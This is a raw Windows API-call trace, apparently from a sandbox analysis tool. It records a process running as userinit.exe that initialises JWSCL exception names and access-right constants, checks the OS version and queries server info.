[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2b2f240*="EJwsclProcessNotFound") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2b2f228*="EJwsclInvalidParameterException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2b2f210*="EJwsclInvalidPathException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2b2f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2b2f1e0*="EJwsclInvalidRevision") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2b2f1c8*="EJwsclInvalidAceMismatch") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2b2f1b0*="EJwsclRevisionMismatchException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2b2f198*="EJwsclInvalidACEException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2b2f180*="EJwsclReadOnlyPropertyException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2b2f168*="EJwsclDuplicateListEntryException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2b2f150*="EJwsclIndexOutOfBoundsException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2b2f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2b2f120*="EJwsclInvalidKnownSIDException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2b2f108*="EJwsclInvalidComputer") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2b2f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2b2f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2b2f0c0*="EJwsclInvalidSIDException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2b2f0a8*="EJwsclInvalidSecurityListException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2b2f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2b2f078*="EJwsclEmptyACLException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2b2f060*="EJwsclNILParameterException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2b2f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2b2f030*="EJwsclInvalidObjectArrayException") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2b2f018*="EJwsclProcessIdNotAvailable") returned 1
[0110.275] SysReAllocStringLen (in: pbstr=0x2b2f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2b2f000*="EJwsclWinCallFailedException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2b2efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2b2efd0*="EJwsclNotImplementedException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2b2efb8*="EJwsclAccessTypeException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2b2efa0*="EJwsclAdjustPrivilegeException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2b2ef88*="EJwsclPrivilegeCheckException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2b2ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2b2ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2b2ef40*="EJwsclPrivilegeException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2b2ef28*="EJwsclNotEnoughMemory") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2b2ef10*="EJwsclInvalidTokenHandle") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2b2eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2b2eee0*="EJwsclDuplicateTokenException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2b2eec8*="EJwsclInvalidOwnerException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2b2eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2b2ee98*="EJwsclTokenPrimaryException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2b2ee80*="EJwsclTokenImpersonationException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2b2ee68*="EJwsclTokenInformationException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2b2ee50*="EJwsclSharedTokenException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2b2ee38*="EJwsclOpenProcessTokenException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2b2ee20*="EJwsclOpenThreadTokenException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2b2ee08*="EJwsclSecurityException") returned 1
[0110.276] SysReAllocStringLen (in: pbstr=0x2b2edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2b2edf0*="Exception") returned 1
[0110.276] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.276] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0110.276] GetVersionExA (in: lpVersionInformation=0xcf354*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x1f0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="|ó\x0c") | out: lpVersionInformation=0xcf354*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0110.276] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0110.276] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0110.282] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0110.282] NetServerGetInfo (in: servername="", level=0x65, bufptr=0xcf3d8 | out: bufptr=0xcf3d8) returned 0x0
[0110.351] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0110.351] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0110.351] NetApiBufferFree (Buffer=0x211d00) returned 0x0
[0110.352] SetErrorMode (uMode=0x8000) returned 0x1
[0110.352] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0110.352] SetErrorMode (uMode=0x1) returned 0x8000
[0110.352] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.353] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.355] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.357] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2ec40*="DELETE") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2ec30*="READ_CONTROL") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2ec20*="WRITE_OWNER") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2ec10*="WRITE_DAC") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2b2ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2b2ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2b2ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2b2ebd0*="FILE_WRITE_DATA") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2b2ebc0*="FILE_READ_DATA") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2b2ebb0*="FILE_ALL_ACCESS") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2eb80*="STANDARD_RIGHTS_READ") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2eb70*="STANDARD_RIGHTS_ALL") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2eb50*="DELETE") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2eb40*="READ_CONTROL") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2eb30*="WRITE_OWNER") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2eb20*="WRITE_DAC") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2b2eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2b2eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2b2eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2b2eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0110.358] SysReAllocStringLen (in: pbstr=0x2b2ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2b2ead0*="TOKEN_QUERY_SOURCE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2b2eac0*="TOKEN_QUERY") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2b2eab0*="TOKEN_IMPERSONATE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2b2eaa0*="TOKEN_DUPLICATE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2b2ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2b2ea80*="TOKEN_ALL_ACCESS") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2ea50*="STANDARD_RIGHTS_READ") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2ea40*="STANDARD_RIGHTS_ALL") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2ea30*="DELETE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2ea20*="READ_CONTROL") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2ea10*="WRITE_OWNER") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2ea00*="WRITE_DAC") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2b2e9f0*="TIMER_MODIFY_STATE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2b2e9e0*="TIMER_QUERY_STATE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2b2e9d0*="TIMER_ALL_ACCESS") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e9a0*="STANDARD_RIGHTS_READ") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e990*="STANDARD_RIGHTS_ALL") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e980*="DELETE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e970*="READ_CONTROL") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e960*="WRITE_OWNER") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e950*="WRITE_DAC") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2b2e940*="SECTION_EXTEND_SIZE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2b2e930*="FILE_MAP_READ") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2b2e920*="FILE_MAP_WRITE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2b2e910*="FILE_MAP_COPY") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2b2e900*="FILE_MAP_ALL_ACCESS") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e8d0*="STANDARD_RIGHTS_READ") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e8b0*="DELETE") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e8a0*="READ_CONTROL") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e890*="WRITE_OWNER") returned 1
[0110.359] SysReAllocStringLen (in: pbstr=0x2b2e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e880*="WRITE_DAC") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2b2e870*="MUTEX_MODIFY_STATE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2b2e860*="MUTEX_ALL_ACCESS") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e840*="STANDARD_RIGHTS_WRITE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e830*="STANDARD_RIGHTS_READ") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e820*="STANDARD_RIGHTS_ALL") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e810*="DELETE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e800*="READ_CONTROL") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e7f0*="WRITE_OWNER") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e7e0*="WRITE_DAC") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2b2e7d0*="EVENT_MODIFY_STATE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2b2e7c0*="EVENT_ALL_ACCESS") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e790*="STANDARD_RIGHTS_READ") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e780*="STANDARD_RIGHTS_ALL") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e770*="DELETE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e760*="READ_CONTROL") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e750*="WRITE_OWNER") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e740*="WRITE_DAC") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2b2e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2b2e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2b2e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2b2e700*="STANDARD_RIGHTS_WRITE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2b2e6f0*="STANDARD_RIGHTS_READ") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2b2e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2b2e6d0*="DELETE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2b2e6c0*="READ_CONTROL") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2b2e6b0*="WRITE_OWNER") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2b2e6a0*="WRITE_DAC") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2b2e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2b2e680*="JOB_OBJECT_TERMINATE") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2b2e670*="JOB_OBJECT_QUERY") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2b2e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0110.360] SysReAllocStringLen (in: pbstr=0x2b2e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2b2e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
